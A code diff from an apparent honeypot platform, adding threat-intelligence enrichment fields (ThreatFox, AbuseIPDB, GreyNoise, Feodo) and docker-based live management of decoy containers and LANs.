# Each match in ``data`` carries threat_type / ioc_type / malware
|
||||||
|
# (canonical family). The IntelLifter dispatches ATT&CK techniques
|
||||||
|
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
|
||||||
|
# cc_skimming); the other two columns are evidence and SIEM
|
||||||
|
# context. Sets are flattened across matches and serialised
|
||||||
|
# sorted for determinism.
|
||||||
|
threat_types: set[str] = set()
|
||||||
|
ioc_types: set[str] = set()
|
||||||
|
families: set[str] = set()
|
||||||
|
if isinstance(data, list):
|
||||||
|
for entry in data:
|
||||||
|
if not isinstance(entry, dict):
|
||||||
|
continue
|
||||||
|
tt = entry.get("threat_type")
|
||||||
|
if isinstance(tt, str) and tt:
|
||||||
|
threat_types.add(tt)
|
||||||
|
it = entry.get("ioc_type")
|
||||||
|
if isinstance(it, str) and it:
|
||||||
|
ioc_types.add(it)
|
||||||
|
family = entry.get("malware") or entry.get("malware_printable")
|
||||||
|
if isinstance(family, str) and family:
|
||||||
|
families.add(family)
|
||||||
return IntelResult(
|
return IntelResult(
|
||||||
provider=self.name,
|
provider=self.name,
|
||||||
verdict="malicious" if listed else None,
|
verdict="malicious" if listed else None,
|
||||||
column_updates={
|
column_updates={
|
||||||
"threatfox_listed": listed,
|
"threatfox_listed": listed,
|
||||||
"threatfox_raw": json.dumps(data),
|
"threatfox_threat_types": sorted(threat_types),
|
||||||
|
"threatfox_ioc_types": sorted(ioc_types),
|
||||||
|
"threatfox_malware_families": sorted(families),
|
||||||
|
"threatfox_raw": data,
|
||||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||||
},
|
},
|
||||||
)
|
)
|
||||||
|
|||||||
@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def _build_intel_event_payload(
|
||||||
|
attacker_uuid: str,
|
||||||
|
ip: str,
|
||||||
|
row: dict[str, Any],
|
||||||
|
providers: list[IntelProvider],
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
"""Project the AttackerIntel row into the bus event the TTP worker
|
||||||
|
consumes as ``source_kind="intel"``.
|
||||||
|
"""
|
||||||
|
return {
|
||||||
|
"attacker_uuid": attacker_uuid,
|
||||||
|
"attacker_ip": ip,
|
||||||
|
"aggregate_verdict": row.get("aggregate_verdict"),
|
||||||
|
"providers": [p.name for p in providers],
|
||||||
|
# AbuseIPDB
|
||||||
|
"abuseipdb_score": row.get("abuseipdb_score"),
|
||||||
|
"abuseipdb_categories": row.get("abuseipdb_categories") or [],
|
||||||
|
# GreyNoise
|
||||||
|
"greynoise_classification": row.get("greynoise_classification"),
|
||||||
|
"greynoise_name": row.get("greynoise_name"),
|
||||||
|
"greynoise_tags": row.get("greynoise_tags") or [],
|
||||||
|
# Feodo
|
||||||
|
"feodo_listed": row.get("feodo_listed"),
|
||||||
|
"feodo_malware_family": row.get("feodo_malware_family"),
|
||||||
|
# ThreatFox
|
||||||
|
"threatfox_listed": row.get("threatfox_listed"),
|
||||||
|
"threatfox_threat_types": row.get("threatfox_threat_types") or [],
|
||||||
|
"threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
|
||||||
|
"threatfox_malware_families": row.get("threatfox_malware_families") or [],
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
async def _enrich_one(
|
async def _enrich_one(
|
||||||
attacker_uuid: str,
|
attacker_uuid: str,
|
||||||
ip: str,
|
ip: str,
|
||||||
@@ -172,12 +204,9 @@ async def run_intel_loop(
|
|||||||
await publish_safely(
|
await publish_safely(
|
||||||
bus,
|
bus,
|
||||||
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
|
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
|
||||||
{
|
_build_intel_event_payload(
|
||||||
"attacker_uuid": attacker_uuid,
|
attacker_uuid, ip, row, providers,
|
||||||
"attacker_ip": ip,
|
),
|
||||||
"aggregate_verdict": row.get("aggregate_verdict"),
|
|
||||||
"providers": [p.name for p in providers],
|
|
||||||
},
|
|
||||||
event_type=_topics.ATTACKER_INTEL_ENRICHED,
|
event_type=_topics.ATTACKER_INTEL_ENRICHED,
|
||||||
)
|
)
|
||||||
except Exception: # noqa: BLE001
|
except Exception: # noqa: BLE001
|
||||||
@@ -200,11 +229,11 @@ async def run_intel_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
|
|||||||
self.component = component
|
self.component = component
|
||||||
|
|
||||||
def filter(self, record: logging.LogRecord) -> bool:
|
def filter(self, record: logging.LogRecord) -> bool:
|
||||||
record.decnet_component = self.component # type: ignore[attr-defined]
|
record.decnet_component = self.component
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
|
|||||||
span = trace.get_current_span()
|
span = trace.get_current_span()
|
||||||
ctx = span.get_span_context()
|
ctx = span.get_span_context()
|
||||||
if ctx and ctx.trace_id:
|
if ctx and ctx.trace_id:
|
||||||
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
|
record.otel_trace_id = format(ctx.trace_id, "032x")
|
||||||
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
|
record.otel_span_id = format(ctx.span_id, "016x")
|
||||||
else:
|
else:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
except Exception:
|
except Exception:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
|
|||||||
services: list[str] = PydanticField(..., min_length=1)
|
services: list[str] = PydanticField(..., min_length=1)
|
||||||
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
|
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
|
||||||
base_image: str # Docker image for the base/IP-holder container
|
base_image: str # Docker image for the base/IP-holder container
|
||||||
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
|
build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
|
||||||
hostname: str
|
hostname: str
|
||||||
archetype: str | None = None # archetype slug if spawned from an archetype profile
|
archetype: str | None = None # archetype slug if spawned from an archetype profile
|
||||||
service_config: dict[str, dict] = PydanticField(default_factory=dict)
|
service_config: dict[str, dict] = PydanticField(default_factory=dict)
|
||||||
|
|||||||
@@ -101,7 +101,10 @@ async def mutate_decky(
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
# Wrap blocking call in thread
|
# Wrap blocking call in thread
|
||||||
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
|
cp = compose_path
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
|
||||||
|
)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
log.error("mutation failed decky=%s error=%s", decky_name, e)
|
log.error("mutation failed decky=%s error=%s", decky_name, e)
|
||||||
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
|
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
|
||||||
@@ -161,6 +164,8 @@ async def mutate_all(
|
|||||||
if force or only is not None:
|
if force or only is not None:
|
||||||
due = True
|
due = True
|
||||||
else:
|
else:
|
||||||
|
if interval_mins is None:
|
||||||
|
continue
|
||||||
elapsed_secs = now - decky.last_mutated
|
elapsed_secs = now - decky.last_mutated
|
||||||
due = elapsed_secs >= (interval_mins * 60)
|
due = elapsed_secs >= (interval_mins * 60)
|
||||||
remaining = (interval_mins * 60) - elapsed_secs
|
remaining = (interval_mins * 60) - elapsed_secs
|
||||||
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
|
|||||||
return 0
|
return 0
|
||||||
drained = 0
|
drained = 0
|
||||||
for topo in pending:
|
for topo in pending:
|
||||||
tid = topo["id"]
|
tid = topo.id
|
||||||
try:
|
try:
|
||||||
await _deployer.resync_agent_topology(repo, tid)
|
await _deployer.resync_agent_topology(repo, tid)
|
||||||
await repo.set_topology_resync(tid, False)
|
await repo.set_topology_resync(tid, False)
|
||||||
drained += 1
|
drained += 1
|
||||||
log.info("topology %s resynced to agent %s",
|
log.info("topology %s resynced to agent %s",
|
||||||
tid, topo.get("target_host_uuid"))
|
tid, topo.target_host_uuid)
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc: # noqa: BLE001
|
||||||
log.warning(
|
log.warning(
|
||||||
"topology %s resync failed (will retry): %s", tid, exc,
|
"topology %s resync failed (will retry): %s", tid, exc,
|
||||||
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_lan_change(
|
||||||
|
repo: Any,
|
||||||
|
topology_id: str,
|
||||||
|
*,
|
||||||
|
created: Optional[tuple[str, str, bool]] = None,
|
||||||
|
removed: Optional[str] = None,
|
||||||
|
) -> None:
|
||||||
|
"""Create or remove the docker bridge for a live LAN op + re-render compose.
|
||||||
|
|
||||||
|
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
|
||||||
|
write lands. Skips when:
|
||||||
|
|
||||||
|
* the topology is not active/degraded (a pending topology gets its
|
||||||
|
networks created at deploy time),
|
||||||
|
* the topology is pinned to a swarm agent (cross-host materialisation
|
||||||
|
isn't implemented; the agent's apply_topology RPC re-renders the
|
||||||
|
whole compose at next push),
|
||||||
|
* the docker SDK / networking primitive raises (logged, not
|
||||||
|
re-raised — the DB row is the source of truth).
|
||||||
|
"""
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
if topology is None:
|
||||||
|
return
|
||||||
|
status = topology.status
|
||||||
|
if status not in ("active", "degraded"):
|
||||||
|
return
|
||||||
|
if topology.target_host_uuid:
|
||||||
|
_log.info(
|
||||||
|
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
|
||||||
|
topology_id,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
# Lazy imports — these pull in docker.py / network.py which both
|
||||||
|
# require the docker SDK; keeping them out of module-import keeps
|
||||||
|
# the mutator usable in test environments that stub docker.
|
||||||
|
import docker
|
||||||
|
from decnet.engine.deployer import _topology_compose_path
|
||||||
|
from decnet.network import create_bridge_network, remove_bridge_network
|
||||||
|
from decnet.topology.compose import _network_name, write_topology_compose
|
||||||
|
|
||||||
|
client = docker.from_env()
|
||||||
|
try:
|
||||||
|
if created is not None:
|
||||||
|
name, subnet, is_dmz = created
|
||||||
|
net_name = _network_name(topology_id, name)
|
||||||
|
try:
|
||||||
|
create_bridge_network(
|
||||||
|
client, net_name, subnet, internal=not is_dmz,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
|
||||||
|
topology_id, name, subnet, exc,
|
||||||
|
)
|
||||||
|
# Don't re-raise — the DB row is the source of truth.
|
||||||
|
# Operator can retry by removing + re-adding the LAN.
|
||||||
|
if removed is not None:
|
||||||
|
net_name = _network_name(topology_id, removed)
|
||||||
|
try:
|
||||||
|
remove_bridge_network(client, net_name)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
|
||||||
|
topology_id, removed, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Re-render compose so the file on disk matches the DB. Even
|
||||||
|
# when the bridge create above failed, a future redeploy will
|
||||||
|
# try to bring the network back from the compose definition.
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is not None:
|
||||||
|
try:
|
||||||
|
write_topology_compose(
|
||||||
|
hydrated, _topology_compose_path(topology_id),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live LAN op: compose re-render failed topology=%s: %s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
|
||||||
|
_log.error(
|
||||||
|
"live LAN materialisation crashed topology=%s: %s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _is_buildx_wedge(exc: BaseException) -> bool:
|
||||||
|
"""True when *exc* looks like the buildx EROFS wedge.
|
||||||
|
|
||||||
|
We consult both the structured CalledProcessError.stderr and the
|
||||||
|
str(exc) form because ``_compose_with_retry`` raises a synthetic
|
||||||
|
CalledProcessError whose ``stderr`` contains the recovery hint
|
||||||
|
(which preserves the wedge signatures verbatim).
|
||||||
|
"""
|
||||||
|
from decnet.engine.deployer import (
|
||||||
|
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
|
||||||
|
)
|
||||||
|
stderr = ""
|
||||||
|
if hasattr(exc, "stderr") and exc.stderr:
|
||||||
|
stderr = str(exc.stderr)
|
||||||
|
haystack = (stderr + " " + str(exc)).lower()
|
||||||
|
return (
|
||||||
|
_BUILDX_WEDGE_SIGNATURE in haystack
|
||||||
|
and _BUILDX_EROFS_SIGNATURE in haystack
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _compose_up_with_buildkit_fallback(
|
||||||
|
*args: str, compose_file, label: str,
|
||||||
|
) -> None:
|
||||||
|
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
|
||||||
|
|
||||||
|
The buildx activity dir occasionally lands on a read-only mount —
|
||||||
|
happens enough on operator dev boxes that we don't want a single
|
||||||
|
wedge to abort a live decky-add. When _compose_with_retry raises
|
||||||
|
with the EROFS-wedge signatures, we retry once with
|
||||||
|
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
|
||||||
|
use the activity dir and isn't affected.
|
||||||
|
|
||||||
|
*label* is a human-readable identifier used only in log lines so an
|
||||||
|
operator can grep the fall-back back to the originating op.
|
||||||
|
"""
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import _compose_with_retry
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry(*args, compose_file=compose_file),
|
||||||
|
)
|
||||||
|
return
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
if not _is_buildx_wedge(exc):
|
||||||
|
raise
|
||||||
|
_log.warning(
|
||||||
|
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
|
||||||
|
"(legacy builder). Recover the buildx state at your leisure: "
|
||||||
|
"rm -rf ~/.docker/buildx/activity && "
|
||||||
|
"docker buildx create --name decnet-builder --use --bootstrap",
|
||||||
|
label,
|
||||||
|
)
|
||||||
|
# Outside the except so the second attempt's traceback isn't
|
||||||
|
# nested under the first failure if it also blows up.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry(
|
||||||
|
*args, compose_file=compose_file,
|
||||||
|
env={"DOCKER_BUILDKIT": "0"},
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
|
||||||
|
"""Compose service names for one decky: base + each per-decky service.
|
||||||
|
|
||||||
|
Skips ``fleet_singleton`` services — those run once fleet-wide and
|
||||||
|
don't have a per-decky compose entry. Mirrors the same filter
|
||||||
|
applied at compose-render time
|
||||||
|
(:mod:`decnet.topology.compose.generate_topology_compose`).
|
||||||
|
"""
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
targets = [decky_name]
|
||||||
|
for svc_name in services:
|
||||||
|
try:
|
||||||
|
svc = get_service(svc_name)
|
||||||
|
except KeyError:
|
||||||
|
# Unknown service — leave it; the compose render won't emit
|
||||||
|
# a fragment for it, so compose up will simply ignore the
|
||||||
|
# name with a clear "no such service" error. Surface that
|
||||||
|
# rather than silently dropping it.
|
||||||
|
targets.append(f"{decky_name}-{svc_name}")
|
||||||
|
continue
|
||||||
|
if svc.fleet_singleton:
|
||||||
|
continue
|
||||||
|
targets.append(f"{decky_name}-{svc_name}")
|
||||||
|
return targets
|
||||||
|
|
||||||
|
|
||||||
|
async def _live_topology_or_none(
|
||||||
|
repo: Any, topology_id: str,
|
||||||
|
) -> Optional[dict[str, Any]]:
|
||||||
|
"""Return the topology row only when it's eligible for live materialisation.
|
||||||
|
|
||||||
|
Returns None (so callers can skip with a single ``if`` check) when:
|
||||||
|
|
||||||
|
* the topology doesn't exist;
|
||||||
|
* status is not ``active`` or ``degraded`` (pending topologies get
|
||||||
|
everything materialised at deploy time);
|
||||||
|
* the topology is pinned to a swarm agent (cross-host live editing
|
||||||
|
is its own routing workstream).
|
||||||
|
"""
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
if topology is None:
|
||||||
|
return None
|
||||||
|
if topology.status not in ("active", "degraded"):
|
||||||
|
return None
|
||||||
|
if topology.target_host_uuid:
|
||||||
|
_log.info(
|
||||||
|
"live decky op skipped (agent-pinned topology=%s); "
|
||||||
|
"next agent push will reconcile",
|
||||||
|
topology_id,
|
||||||
|
)
|
||||||
|
return None
|
||||||
|
return topology
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_compose(repo: Any, topology_id: str) -> None:
|
||||||
|
"""Re-render the per-topology compose file from the current DB.
|
||||||
|
|
||||||
|
Called after each materialisation step so the file on disk matches
|
||||||
|
the topology rows. Soft-fails: a render error is logged but
|
||||||
|
doesn't poison the DB-side mutation.
|
||||||
|
"""
|
||||||
|
from decnet.engine.deployer import _topology_compose_path
|
||||||
|
from decnet.topology.compose import write_topology_compose
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
return
|
||||||
|
try:
|
||||||
|
write_topology_compose(hydrated, _topology_compose_path(topology_id))
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live op: compose re-render failed topology=%s: %s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_spawn(
|
||||||
|
repo: Any, topology_id: str, decky_name: str, services: list[str],
|
||||||
|
) -> bool:
|
||||||
|
"""compose up -d --no-deps --build for one decky (base + services).
|
||||||
|
|
||||||
|
Re-renders compose first so the file lists the new decky. Returns
|
||||||
|
True when compose-up reported success, False otherwise (or when
|
||||||
|
the topology isn't eligible for live materialisation — pending
|
||||||
|
topologies skip and return False so the caller doesn't flip the
|
||||||
|
state to ``running`` based on a no-op). Best-effort: docker
|
||||||
|
failure is logged, not re-raised — DB row is the source of truth.
|
||||||
|
"""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return False
|
||||||
|
from decnet.engine.deployer import _topology_compose_path
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
targets = _decky_targets(decky_name, services)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
try:
|
||||||
|
await _compose_up_with_buildkit_fallback(
|
||||||
|
"up", "-d", "--no-deps", "--build", *targets,
|
||||||
|
compose_file=compose_path,
|
||||||
|
label=f"live add_decky topology={topology_id} decky={decky_name}",
|
||||||
|
)
|
||||||
|
return True
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live add_decky: compose up failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_remove(
|
||||||
|
repo: Any, topology_id: str, decky_name: str, services: list[str],
|
||||||
|
) -> None:
|
||||||
|
"""compose stop + rm -f for one decky's containers, then re-render."""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import _compose, _topology_compose_path
|
||||||
|
|
||||||
|
targets = _decky_targets(decky_name, services)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
|
||||||
|
# longer mentions the decky, so a stop run AFTER rendering would
|
||||||
|
# find no service to act on.
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("stop", *targets, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_connect(
|
||||||
|
repo: Any, topology_id: str,
|
||||||
|
decky_name: str, lan_name: str, ipv4_address: str,
|
||||||
|
) -> None:
|
||||||
|
"""SDK ``network.connect`` to multi-home a running base container.
|
||||||
|
|
||||||
|
Service containers share the base's netns via ``network_mode:
|
||||||
|
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
|
||||||
|
the base alone gives every service container the new interface for
|
||||||
|
free — we don't need to iterate.
|
||||||
|
"""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import docker
|
||||||
|
from decnet.topology.compose import _container_name, _network_name
|
||||||
|
|
||||||
|
net_name = _network_name(topology_id, lan_name)
|
||||||
|
container_name = _container_name(topology_id, decky_name)
|
||||||
|
try:
|
||||||
|
client = docker.from_env()
|
||||||
|
net = client.networks.get(net_name)
|
||||||
|
container = client.containers.get(container_name)
|
||||||
|
net.connect(container, ipv4_address=ipv4_address)
|
||||||
|
except docker.errors.APIError as exc:
|
||||||
|
# Idempotency — already on the network is fine.
|
||||||
|
msg = str(exc).lower()
|
||||||
|
if "already" in msg or "endpoint" in msg and "exists" in msg:
|
||||||
|
_log.info(
|
||||||
|
"live attach_decky: %s already on network %s — skipping",
|
||||||
|
container_name, net_name,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
_log.error(
|
||||||
|
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_disconnect(
|
||||||
|
repo: Any, topology_id: str, decky_name: str, lan_name: str,
|
||||||
|
) -> None:
|
||||||
|
"""SDK ``network.disconnect`` to drop a multi-home edge."""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import docker
|
||||||
|
from decnet.topology.compose import _container_name, _network_name
|
||||||
|
|
||||||
|
net_name = _network_name(topology_id, lan_name)
|
||||||
|
container_name = _container_name(topology_id, decky_name)
|
||||||
|
try:
|
||||||
|
client = docker.from_env()
|
||||||
|
net = client.networks.get(net_name)
|
||||||
|
container = client.containers.get(container_name)
|
||||||
|
net.disconnect(container)
|
||||||
|
except docker.errors.APIError as exc:
|
||||||
|
msg = str(exc).lower()
|
||||||
|
if "not connected" in msg or "no such" in msg:
|
||||||
|
_log.info(
|
||||||
|
"live detach_decky: %s already off network %s — skipping",
|
||||||
|
container_name, net_name,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
_log.error(
|
||||||
|
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_services_diff(
|
||||||
|
repo: Any, topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
added: list[str],
|
||||||
|
removed: list[str],
|
||||||
|
) -> None:
|
||||||
|
"""Add/remove per-service containers without touching siblings.
|
||||||
|
|
||||||
|
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
|
||||||
|
without coupling the mutator to that module — service mutations
|
||||||
|
routed via the mutator queue publish ``mutation.applied`` while the
|
||||||
|
direct API publishes ``decky.<name>.service_added``; they share
|
||||||
|
machinery, not control flow.
|
||||||
|
"""
|
||||||
|
if not added and not removed:
|
||||||
|
return
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import _compose, _topology_compose_path
|
||||||
|
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
|
||||||
|
if add_targets:
|
||||||
|
try:
|
||||||
|
await _compose_up_with_buildkit_fallback(
|
||||||
|
"up", "-d", "--no-deps", "--build", *add_targets,
|
||||||
|
compose_file=compose_path,
|
||||||
|
label=f"live update_decky add topology={topology_id} decky={decky_name}",
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live update_decky add: compose up failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
rm_targets = _decky_targets(decky_name, list(removed))[1:]
|
||||||
|
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
|
||||||
|
if not rm_targets:
|
||||||
|
break
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live update_decky %s failed topology=%s decky=%s: %s",
|
||||||
|
action_name, topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_recreate_base(
|
||||||
|
repo: Any, topology_id: str, decky_name: str,
|
||||||
|
) -> None:
|
||||||
|
"""Force-recreate just the base container (used for forwards_l3 flips).
|
||||||
|
|
||||||
|
DESTRUCTIVE: kills any in-container state on the base. Service
|
||||||
|
containers re-attach via ``network_mode: service:<base>`` after the
|
||||||
|
base is rebuilt. Caller is responsible for gating this on an
|
||||||
|
explicit operator-supplied ``force=true`` flag.
|
||||||
|
"""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import (
|
||||||
|
_compose_with_retry, _topology_compose_path,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry(
|
||||||
|
"up", "-d", "--no-deps", "--force-recreate", decky_name,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
